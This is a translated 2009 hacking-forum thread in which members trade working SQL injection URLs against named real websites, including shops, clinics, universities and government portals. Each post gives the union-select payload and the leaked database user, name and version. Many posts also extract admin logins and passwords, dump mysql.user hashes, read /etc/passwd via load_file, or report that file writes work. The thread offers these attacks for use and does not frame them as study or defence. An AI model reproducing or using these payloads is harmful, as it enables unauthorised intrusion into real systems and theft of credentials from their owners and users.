View full version: SQL Injections


Ctacok
21.10.2009, 09:12
http://heroi.org.ua/img.php?id=-301+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version())+--+
User: freemp3_slovo@193.200.173.5
Database: freemp3_slovo
Version: 4.1.22-log

Dyxxx
21.10.2009, 13:12
Sivanandabahamas.org pr4
Sivananda Bahamas Yoga Retreat. )
http://www.sivanandabahamas.org/index.php?page_id=null+union+select+conc at_ws(char(32,124,32),version(),user(),database(), @@version_compile_os)+--+5.0.27-log | my_yoga_net@localhost | my_yoga_net | redhat-linux-gnu

ILYAtirtir
21.10.2009, 18:44
Fund for Social Support of Employees and Veterans of the Customs Service (S.V.T.S. Fund).
http://svts.ru/cgi-bin/eng.pl?type=2&id=-322+union+select+1,concat_ws(0x3a,database(),user( ),version()),3+--+&section=fund_link
svts:root@localhost:5.0.45


Belarusian State Institute of Metrology.
http://www.belgim.by/viewcat.php?cat_id=-11+union+select+1,2,3,concat_ws(0x3a,database(),us er(),version()),5,6,7,8,9
belgimby:belgim@localhost:5.1.39

diman94x
21.10.2009, 22:18
Server = Apache/2.0.54 (Fedora)
Version = 5.0.79
Powered by = PHP/5.2.8
Attack Type = SQL Union Injection
Current User = lactuel@localhost
Current Database = lactuel
Supports Union = yes
Union Columns = 19
Url| http://www.lactuel.be/index.php?catId=-106
Vuln: http://www.lactuel.be/index.php?catId=-106+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Sharky
22.10.2009, 02:20
Official site of the artist Julia Gilmore pr-3
http://www.juliagilmore.ca/gallery.php?pageid=17+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,12,13---

andreakr_julia@localhost
5.0.81-community-log
andreakr_julia

Ctacok
22.10.2009, 08:47
Some kind of shop.
http://www.thethingsiwant.com/wishing/addtolist_s.php4?ItemID=-108891+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,u ser(),database(),version()),9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23+--+
User: root@localhost
Database: whitestripe3
Version: 4.1.22-standard

DeluxeS
22.10.2009, 16:45
http://www.ssprava.org/index.php?id=-3+union+select+version%28%29,2

Dyxxx
22.10.2009, 17:09
Adt.com.tw pr5
Bureau Veritas ADT *wut?
http://www.adt.com.tw/indexNewsData.phtml?NEWSID=1'+and+substring(versio n(),1,1)=3+--+version: 3.23.58
user: user1@localhost
database: my_news

Snap
22.10.2009, 18:11
http://www.red-army.ru
Everything about sports, everything about CSKA!

http://www.red-army.ru/news/?a=news&id=1453+union+select+1,2,3,concat_ws(char(58),TABL E_SCHEMA,TABLE_NAME,COLUMN_NAME)+from+INFORMATION_ SCHEMA.COLUMNS/*

http://www.red-army.ru/news/?a=news&id=1453+union+select+1,2,3,concat(user,char(58),pa ssword)+from+users+limit+2,1/*

[underwater]
22.10.2009, 18:59
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12--
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,concat(table_name),3,4,5,6,7, 8,9,10,11,12+FROM+information_schema.tables+LIMIT+ 22,1--
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,group_concat(column_name),3,4 ,5,6,7,8,9,10,11,12+from+information_Schema.column s+where+table_name=0x68616c5f61646d696e69737472617 46f7273--
http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,group_concat(emailid,0x3a,Use rID,0x3a,Password),3,4,5,6,7,8,9,10,11,12+from+hal _administrators

Ctacok
22.10.2009, 19:29
http://museums-foreningen.dk/viewer.php4?uniq_id=-1010083+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+

User: museums_fo@linux3.123hotel.dk
Database: museums_foreningen_dk_db
Version: 5.0.27-standard

Bilyak
22.10.2009, 23:55
http://www.tabacum.ru/shoppic.php?id=-3+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user (),database(),version())--

Database Version: 4.1.25-log
Database name: wwwlena_ivanovaru_tabacum
User name: lenaivan@localhost

Football Transfer Exchange

http://legion21.com.ua/exchange/cv.php?id=-45+union+select+1,2,3,4,5,6,7,version(),9

Database Version: 4.1.22-log
Database name: legion21
User name: u_legion21@localhost

Ukrainian Opel Club

http://www.opel-club.com.ua/partner/index.php?category=-1+union+select+1,2,database%28%29,version%28%29,5

Database Version: 5.0.51a-log
Database name: opelclub_phpmydirectory
User name: opelclub_cards@localhost


TV, online store "Як Барбі"

http://tvshop.com.ua/catalog.php?cid=0+union+select+1,version(),3,4,5/*

Database Version: 4.0.27-standard-log
Database name: I-shop
User name: i-shop@localhost

Ctacok
23.10.2009, 06:51
The scanner said that an injection is possible at http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ but whatever I put in the query, I get nothing in response. Please help with some advice.
That belongs in "Your questions about vulnerabilities"


http://webcaredesign.dk/viewer.php4?uniq_id=-1010001+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+


User:tastselvwe@80.160.71.24
Database:tastselvweb_dk_db
Version:5.0.27-standard

nikp
23.10.2009, 08:29
5.0.44-log:MySQLr00t@localhost
http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+concat_ws(0x3a,version(),user()), 2,concat_ws(0x3a,host,user,password,file_priv),4+f rom+mysql.user
http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+load_file(0x2F6574632F70617373776 4),2,3,4

IgAlex
23.10.2009, 11:11
www.louvores.net

http://www.louvores.net/home.php?genres_parent=11+union+all+select+concat_ ws%280x3a,version%28%29,database%28%29,user%28%29% 29,2,3,4,5,6--

user:louvores_root@localhost
vers:5.0.81-community
base:louvores_opial


www.freerfmusic.com

http://freerfmusic.com/home.php?genres_parent=12+union+all+select+concat_ ws%280x3a,version%28%29,database%28%29,user%28%29, 2,3,4,5,6,7--

user:freerfmu_llk@localhost
vers:5.0.81-community
base:freerfmu_mdb

hack-win32
23.10.2009, 14:49
sportsbl@localhost:bolang:5.0.51b-enterprise-gpl
http://www.sportsbl.com/hot/mp3.php?ID=-10420+union+select+1,2,concat_ws(0x3a,user(),datab ase(),version()),4,5,6,7--



hutorby_mp3@localhost:hutorby_mp3hits:4.1.22-standard
http://mp3hits.hutor.by/radionext-mp3.php?id=-6+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6--

Ctacok
23.10.2009, 18:56
http://www.handelsgilde-muenchen.de/m_veranstaltungen_termin.php4?tid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,user(),database(),version())--

User: dbo109396152@212.227.127.130
Database: db109396152
Version: 4.0.27-max-log

A bit earlier I posted about SQL on CMC.dk; here is another one I found in a different spot.

http://www.cmc.dk/artist.php4?id=-114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+--+

cmcdk2@light.securehosting.dk:cmcdk2:4.0.24-log

min7
23.10.2009, 20:39
http://marina-look.com/showimg.php?id=-123+union+select+1,concat_ws(char(58),user(),datab ase(),version()),3,4--
MARINALOOK_DB01@LOCALHOST:MARINALOOK_DB01:4.1.22-STANDARD
pr:3

Ctacok
23.10.2009, 20:43
http://www.soulgate.dk/view-blog.php4?blogID=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45+--+

User: mandala@anvil.thebook.com
Database: mandala
Version: 4.1.20-standard-extsql-log


http://www.colinco.net/printview.php4?uniq_id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23+--+

User: colincoins@80.160.71.25
Database: colincoinstitute_dk_db
Version: 5.0.67-log

I love this game
23.10.2009, 23:22
PR = 5

_http://sdsb.lums.edu.pk/pages/sdsb_faculty_detail.php?id=-3+union+select+1,2,3,4,5,version(),7,8,9,10,11,12--

4.0.20 7

Rubaka
24.10.2009, 00:34
http://www.chu-cme.org/backoffice/newsletter/preview.php?id=15+UNION+SELECT+1,user(),3,4,5,6,7, 8

Database Version: 5.0.67
Database name: chucme
User name: chucme@localhost

nikp
24.10.2009, 01:15
www.hackzone.ru
==================

5.0.27-log : root@ : localhost : root : : Y
http://www.manuals.ws/files/list.php?cat=-1+union+select++1,2,concat_ws(0x203a20,version(),u ser(),host,user,password,file_priv),4,5+from+mysql .user--
http://www.manuals.ws/files/list.php?cat=-1+union+select+1,2,load_file(0x2f6574632f706173737 764),4,5--

The Apache configs contain paths to:
ServerName cracks.hackzone.ru
ServerName mbloc.hackzone.ru
ServerName nod32.hackzone.ru
ServerName www.hackzone.ru
ServerName thecracks.us
ServerName www.crackspider.de
ServerName needcrack.us
ServerName cracks.thebugs.us
ServerName serials.thebugs.us
ServerName www.crackway.com
ServerName www.crackportal.com
ServerName bestcracks.net
etc.

outfile works.

Took a look at Hackzone from the inside, useful.
Please do not harm the project.

MaxRaziel
24.10.2009, 01:20
http://www.aoya-hk.com/news.php?id=-1%20union%20select%201,user(),database(),4,5,6,7,8 ,9,10,11/*

min7
24.10.2009, 21:19
http://www.jordan-home.net/current-news.php?news=-31+union+select+1,2,concat_ws(char(58),user(),data base(),version()),4,5--
alla5sam_site@uk3.valuehost.co.uk:alla5sam_site:4. 0.27-max-log
All sites by 21web.ru that use mysql are vulnerable

Ctacok
25.10.2009, 08:26
http://petfoods.dk/index.php4?traeid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+

User: root@localhost
Database: dbpetfoods
Version: 5.0.27

http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+version()

Version: 5.0.27

It responds with an error to user() and database().

nikp
25.10.2009, 20:33
It responds with an error to user() and database().
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(user())
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(database())
root@localhost : dbalecto

---------------------

5.0.51a-3ubuntu5.1 : root@10.2.22.101 : localhost : root : Y
http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,concat_ws(0x203a20,version(), user(),host,user,password,file_priv),5,6,7,8,9,10, 11,12,13,14,15,16,17,18+from+mysql.user--
http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,load_file(0x2f6574632f7061737 37764),5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Ctacok
25.10.2009, 20:48
http://www.naesekorrektion.dk/printview.php4?uniq_id=-1010007+union+select+1,2,3,4,5,concat_ws(0x3a,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23+--+
User: frederiksb@linux1.123hotel.dk
Database: frederiksborgklinikken_dk_db
Version: 4.1.22-standard

keng
25.10.2009, 21:43
http://www.maindata.info/index.php?id=-1+union+select+1--

4.0.27-standard
maindatask
maindatask@10.2.194.84

Amdell_13
25.10.2009, 21:44
http://www.turkeyexportline.com/category.php?IndustryID=4+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://worldb2b.org/category.php?IndustryID=9+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://www.caribzar.com/category.php?IndustryID=25+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.lebargain.co.cc/category.php?IndustryID=4+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
http://www.lankahub.com/category.php?IndustryID=44+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.caribzar.com/category.php?IndustryID=23+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.singhbaba.com/category.php?IndustryID=68+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://justclone.com/alibabaclone/category.php?IndustryID=20+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://buyerxpo.com/category.php?IndustryID=34+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.ores21.com/category.php?IndustryID=49+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.lebargain.co.cc/category.php?IndustryID=27+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
http://www.euroindiam.com%20;%20www.ores21.com/category.php?IndustryID=65+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
XD

keng
25.10.2009, 22:15
http://www.fibertech.jp/eng/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--

User: asu1340@localhost
Version: 5.0.83
Database: asu1340

s0l_ir0n
26.10.2009, 08:04
Car market:
http://www.avtopark.kz/index.php?show=art&id=-1+union+select 1,2,3,ConCat_ws(0x3a,user(),database(),version()), 5,6,7,8 --

Roston
26.10.2009, 17:47
http://www.standardmedia.co.ke/InsidePage.php?id=-1+union+select+1,2,3,concat_ws(0x203B20,user(),dat abase(),version()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42+--+&cid=4&ttl=Ocampo+probe+team+hires+Swahili+speakers
user: eastand_guest@172.16.13.226
database: eastand_xp
version: 5.0.81-community-log

Slavuti4
26.10.2009, 23:28
ready-rest.com(TIC-50,PR-3)
http://www.ready-rest.com/bases.php?base_code=-24+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54
Version():4.0.27-max-log
Database():ready128
User():ready128@v3.valuehost.ru

heliostour.com(TIC-50,PR-1)
http://www.heliostour.com/index.php?content=-38+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11+--+
Version():4.1.22-log
Database():helio
User():u_helio@localhost

sevur.com.ua(TIC-20,PR-3)
http://www.sevur.com.ua/base.php?hid=-2+union+select+concat_ws(0x3a,version(),user(),dat abase()),2
Version():4.1.22-standard-log
Database():sevur_tour
User():sevur_sevur@localhost

crimea-tourcenter.com(TIC-30,PR-2)
http://www.crimea-tourcenter.com/search.php?type_id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Version():5.0.51a-community
Database():crimeato_crimea
User():crimeato_crimea@localhost

krimtek.com.ua(PR-1)
http://krimtek.com.ua/onenews?news=-1036+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16+--+

Version():4.1.22-log
Database():krimtek
User():u_krimtek@localhost

stroytel.com(TIC-20,PR-3)
http://www.stroytel.com/showmart.php?code=-12+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4

Version():4.1.22-standard
Database():stroytel_db
User():stroytel_db@213.186.117.118

Roston
26.10.2009, 23:45
http://www.aratta-ukraine.com/sacred_ua.php?id=999999+union+select+1,2,3,4,5,6,7 ,8,9,10,concat_ws(0x203B20,unhex(hex(user())),unhe x(hex(database())),unhex(hex(version()))),12,13,14 ,15,16,17,18,19,20,21,22+--+

user: root@localhost
database: portal
version: 5.1.7-beta

TELO
27.10.2009, 00:44
Tour operator
http://www.ukrviza.vn.ua/liste.php?operation=1&nav_id=11&ware_id=-55%20Union%20Select%201,2,3,4,version%28%29,6,7,8, 9,10,11,12%20--
Version = 5.0.32-Debian_7etch3-log
User = ukrviza@localhost
Database = ukrviza

keng
27.10.2009, 00:51
http://accuposturesystems.com/subaccessories1.php?query=1&main_category_id=-1+union+select+1,2,3,4,5,6,7,8,9--

Version: 5.0.81-community-log
User: accupost@localhost
Database: accupost_oneinchristdb

Rubaka
27.10.2009, 01:08
http://www.seaofstories.com/title.php?id=37+UNION+SELECT+1,2,3+LIMIT+1,1

Database Version: 5.0.86-community-log
Database name: seaos_sos
User name: seaos_david@216.86.146.12

http://www.johnlaingpartnership.co.uk/newsdetail.php?article_id=286+UNION+SELECT+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31+FROM+users+LIMIT+1,1

Database Version: 4.1.22-log
Database name: jlpdb
User name: jlpuser@localhost

users:user_email:user_id:user_password

no idea where the admin panel is ((


pr 6

http://www.nescent.org/news/newsdetail.php?id=120+UNION+SELECT+1,2,3,4,5,6,7,8 ,9+LIMIT+1,1

Database Version: 5.0.67-log
Database name: events
User name: readonly@localhost



http://www.caup.washington.edu/Events/newsdetail.php?newsid=20+UNION+SELECT+1,2,3,4,5,6+ LIMIT+1,1

Database Version: 4.0.26-standard
Database name: caup
User name: caupreader@localhost


http://www.arborcarehouston.net/newsdetail.php?id=21+UNION+SELECT+1,2,3,4,5,6,7,8, 9+LIMIT+1,1

Database Version: 4.1.22-max-log
Database name: embark_services
User name: embark_services@97.74.144.200

TELO
27.10.2009, 02:19
Information and analysis magazine Morskoy Flot
http://www.morflot.su/article.php?id=1077+and+1=0+Union%20Select%20UNHEX %28HEX%28version%28%29%29%29%20,2,3%20--
Version = 4.1.13a-nt-max-log
User = 1gb_morflot@10.0.1.27
Database = 1gb_morflot
Institute of Regional Press
http://www.pdi.spb.ru/article.php?id=806+and+1=0+Union+Select+1,2,UNHEX% 28HEX%28version%28%29%29%29,4,5,6,7,8
Version = 5.0.45
User = pdi@localhost
Database = pdi_spb_ru

Ctacok
27.10.2009, 06:21
http://hakatai.mcli.dist.maricopa.edu/mlx/slip_about_sharebacks.php?item=1711+and+2=1+union+ select+1,2,3,4,5,unhex%28hex%28concat_ws%280x3a,us er(),database(),version()%29%29%29%23
User: mcliweb@www.mcli.dist.maricopa.edu
Database: mlx
Version: 5.0.18-log

hack-win32
27.10.2009, 08:58
casper_richie@localhost:casper_main:5.0.81-community
http://www.thecasper.jp/mail.php?id=-45+union+select+concat_ws(0x3a,user(),database(),v ersion()),2--



aya_bp2005@192.168.101.79:aya_bpdb2:5.0.45-log
http://alumni.yale.edu/aya/blueprint/type.php?id=-3+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6--



mfpseals@localhost:mfpseals:4.1.21-standard
http://mfpseals.com/type.php?id=-6+union+select+concat_ws(0x3a,user(),database(),ve rsion())--



sstanifor@213.171.218.161:sstanifor:5.0.77-log
http://www.s-staniforth.co.uk/Type.php?id=-2+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--

HAXTA4OK
27.10.2009, 10:21
http://www.artpaints.ru/firm/index.php?cat=13&subcat=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7--

4.1.22-standard:artpaint_kraski:artpaint_loftyst@lo

Rubaka
27.10.2009, 20:43
http://www.furnitureforbusiness.com.au/newsDetail.php?pid=61+UNION+SELECT+1,2


Database Version: 4.1.22
Database name: furn4biz
User name: furn4biz@localhost

min7
27.10.2009, 21:30
WOMEN.IT
pr 6
http://www.women.it/casadonne/comecitrovi/ricerca/browseass.php3?record=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58,5 8),user(),database(),version()),10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37--
women@localhost::casadonne::4.0.24_Debian-10sarge3-log
http://www.women.it/casadonne/comecitrovi/ricerca/browseass.php3?record=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(char(58,5 8),user,password),10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+mysql.user--

^YaHoo^
28.10.2009, 20:51
http://www.star-design.org/index.php?id1=-269+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10--

4.1.25-log:stadesig@localhost:wwwstadesignru - in the page source

min7
28.10.2009, 22:18
pr:4
http://www.leproscenium.com/Detail.php?IdPiece=-763+union+select+1,2,concat_ws(char(58,58),user(), database(),version()),4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39--
leprosceniumcom@88.191.253.212::leprosceniumcom::5 .0.51a-3ubuntu5.4-log

TELO
29.10.2009, 03:19
Rekitsen-RD tablets (honestly, never heard of them)
http://rekicen.ru/php/content.php?group=1&id=575+and+1=0+=null%20Union%20Select%20%201,conca t_ws%280x3a,user%28%29,database%28%29,version%28%2 9%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37
gastroport_rekic@localhost::gastroport_rekic::5.0. 26-log

Smirnov B.L. Teachers of Russia
http://www.bolesmir.ru/index.php?content=books&name=dictionary_item&dictionary=thema&item_id=5+and+1=0+Union Select+1,UNHEX(HEX(version()))
Version = 5.0.77
User = root@zvm2.host.ru
Database = mav_db ::information_schema::index_search::mav_db:mysql:: newforum

keng
29.10.2009, 06:58
Addiction treatment clinic "Megapolis Medexpress":

http://www.megamed.spb.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Version: 5.0.26-log
Database: engelsa150
User: engelsa150@localhost

keng
29.10.2009, 07:25
Tosno Telecommunications Center:

http://www.tosnotelecom.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

Version: 5.0.45-log
Database: ttc
User: root@localhost

keng
29.10.2009, 07:29
Altermed medical center:

http://www.altermed.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*

Version: 4.1.22-lk-log
Database: altermed_new
User: altermed_new@localhost

Roston
29.10.2009, 08:29
http://wwh.nsys.by/vis.php?id=-1'+union+select+1,2,3,4,concat_ws(0x203B20,user(), database(),version()),6+--+

user: photounion@194.158.194.25
database: photounion_by
version: 5.0.45-log

547
29.10.2009, 15:28
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),d atabase(),user()),3,4,5,6,7,8,9--

5.0.24a-Debian_9ubuntu2.4-log:musics:musics@localhost

and...

http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,unhex(hex(concat_ws(0x3a,u sername,password))),3,4,5,6,7,8,9+from+tele.auth_u ser_md5--

onbka
29.10.2009, 18:25
http://www.newhorizons.com.ua/news_detail.php?id=-72 union select 1,2,3,4,5,concat_ws (0x3a,user(),d atabase(),version()),7,8 --

u_newhorizon@localhost
newhorizons
5.0.51a-24+lenny2-log

547
29.10.2009, 20:04
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),d atabase(),user()),3,4,5,6,7,8,9--

usrmcv@localhost:fmcr:5.1.36-0.dotdeb.0

^YaHoo^
29.10.2009, 21:45
http://www.iase.ru/objects.php?group=1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*
5.0.45:iase@localhost:iase

http://www.newfazenda.ru/user/about.php?id=-1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())
5.0.75:novysvetru@78.108.81.161:novysvetru_fazend

http://www.teplo-spb.ru/catalog?id=48&maker=-1/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,user%20(),database(),versio n()),6,7,8,9,10,11,12/*
teplospbru@localhost:teplospbru:5.0.26-lk-log

crazy~driver
30.10.2009, 00:57
http://www.sportscow.com/scoreboard.php?yid=0910&sport=101+and+1=2+union+select+version()%20#


http://www.craigolsonsports.com/feature.php?fid=8+and+1=2+union+select+COLUMN_NAME ,2,3+from+information_schema.COLUMNS+where+TABLE_N AME=0x7573657273+--+

Rubaka
30.10.2009, 02:29
http://www.autore.biz/content.php?id=6+UNION+SELECT+1,2+LIMIT+1,1

Database Version: 4.1.14
Database name: autoredb
User name: autore@localhost
mysql.user found in DB


http://www.dieselchiptuning.biz/pages/content.php?id=3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13

Database Version: 5.0.22
Database name: beena
User name: beena@localhost
tables

keng
30.10.2009, 04:10
The B.O.S.S. Board:

http://www.thebossboard.com/article.php?newid=-1+union+select+1,2,3,4,5,6--

DB Version: 4.1.22-max-log
DB name: bossboard
DB user: bossboard@97.74.144.124

http://dl.game.21cn.com/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--

Version: 4.0.20-log
Database: pise
User: pise@59.36.102.212

^YaHoo^
30.10.2009, 17:16
http://www.gangotri.ru/cs?action=itemd&itid=-960+union+select+concat_ws(0x3a,user(),database(), version())--
b2005321_1@localhost:2005321_1:5.0.51-log - in the page source

http://www.muscul.ru/article.php?id=-8/**/union/**/select/**/1,2,user(),version(),5,6,7,8,9/*
musculr4_first@localhost 4.1.25-log

http://www.watches.ru/index.php?page=30&art=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())/*
lukonin@localhost:newwatches:4.1.25

547
30.10.2009, 21:01
http://www.ukrlogistica.com.ua/news.php?id=-370+union+select+1,2,concat_ws(0x3a,database(),use r(),version()),4,5,6--

jstudio_test:jstudio_Si@localhost:4.1.22-standard-log

http://www.e-portal.com.ua/news.php?id=-8+union+select+1,group_concat(0x3a,user(),database (),version()),3,4,5,6,7,8,9,10,11,12,13--

:ukrfoto_user@192.168.2.3ukrfoto_db5.0.51a-log

TELO
30.10.2009, 23:15
3Dform studio
http://3dform.ru/?lg=se&a=portfolio&project=37&id_service=7&id=229%20union%20select%201,2,3,4,5,6,concat_ws%28 0x3a,nikname,password%29,8,9,10,11,12%20from%20use r%20--
a7489_2:a7489_2@95.142.35.1:5.0.75-percona-highperf-b11-log

min7
31.10.2009, 00:03
Pr:4
http://apiexchange.com/index_main.php?id=8&idz=-16+union+select+1,2,3,4,5,6,7,8,9,10,11--
Database Version: 4.0.20
Database name: api
User name: apiconnect2@localhost
http://apiexchange.com/index_main.php?id=8&idz=-16+union+select+1,concat_ws(char(58),user,password ),3,4,5,6,7,8,9,10,11+from+mysql.user+limit+0,1--

TELO
31.10.2009, 00:18
Graf studio, website development and promotion
http://www.7ae.ru/portfolio.php?id=-72%27%20union%20select%201,2,3,4,group_concat%280x 3a,user%28%29,database%28%29,version%28%29%29/*
Version:5.0.26-log
Database:grafrru_7ae
user:grafrru_7ae@localhost

keng
31.10.2009, 06:54
Occupational safety and industrial medicine:

http://okhranatruda.ru/view_page.php?page=-1+union+select+1,2,3,4,5,6,7,8,9--

Version: 4.1.25-log
Database: aeropho6_okhrana
User: aeropho6_odmin@localhost
Displayed fields: 2, 5.
Access to mysql.user: No.

-JC-
31.10.2009, 08:41
http://www.templariusze.org/artykuly.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+

H1Z
31.10.2009, 09:57
HostiaWeb.Com - High End Shared, Reseller and Dedicated Web Hosting
http://www.hostiaweb.com/news.php?id=-1+union+select+1,database(),user(),version(),5

Version: 5.1.37
Database: hostw_news
User: hostw_news@localhost

P.S. when does not work in queries =/

Bb0y
31.10.2009, 10:27
http://www.nlrc.gov.ng/publications.php?id=4+union+select+1,concat_ws(0x3 a,id,username,password),3,4,5,6,7+from+adminlogin--
id:username:password

==========================
http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,column_name)+fr om+information_schema.columns+where+table_name=0x6 1646D696E6973747261746F7273

http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,email,0x3a,name ,0x3a,pass)+from+administrators

keng
31.10.2009, 14:16
Dahl's dictionary online:

http://slovardalja.net/word.php?wordid=-1+union+select+1,2,3--

Version: 5.0.81-community-log
Database: slovarda_daldictionary
User: slovarda_daluser@localhost
Displayed fields: 2,3.
Access to mysql.user: No.

ABBYY Lingvo:

http://www.lingvo.ru/lingvox3/?id=1+or+1=@@version--

Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )
Database: Publishing
User: publishing

jokester: Merge your posts, EDIT BUTTON ===>>

^YaHoo^
31.10.2009, 19:07
http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11--
5.0.45-log:bdva_sql@78.140.133.152:bdva
http://ksr.infoshare.ru/lib/?div=-5+union+select+concat_ws(0x3a,user(),version(),dat abase())--
ksrinfoshare@localhost:5.0.51a-log:h_ksr
http://www.greeceforyou.ru/hotels.php?id=76/**/union/**/select/**/1,concat_ws(0x3a,user(),version(),database()),3/*
greeceforyou-ru@fhe.hoster.ru:4.0.27-log:greeceforyou-ru
http://www.avtodirect.ru/doc.php?supplyID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database())/*
4.0.16-log:avtodirect@localhost:avtodirect_ru

pelligrim
31.10.2009, 22:08
http://www.tax.vsem.com.ua/index.php?page=news.html&idnn=2432+union+select+1,2,3,4,concat_ws%280x3a,un hex%28hex%28version%28%29%29%29,unhex%28hex%28user %28%29%29%29,unhex%28hex%28database%28%29%29%29%29 +from+information_schema.tables--
5.0.18-nt-log:1gbua_seren@213.186.117.201:1gbua_seren

http://www.jamescourtney.com.au/media/news?id=4+union+select+1,2,concat_ws(0x3a,version( ),user(),database()),4,5--
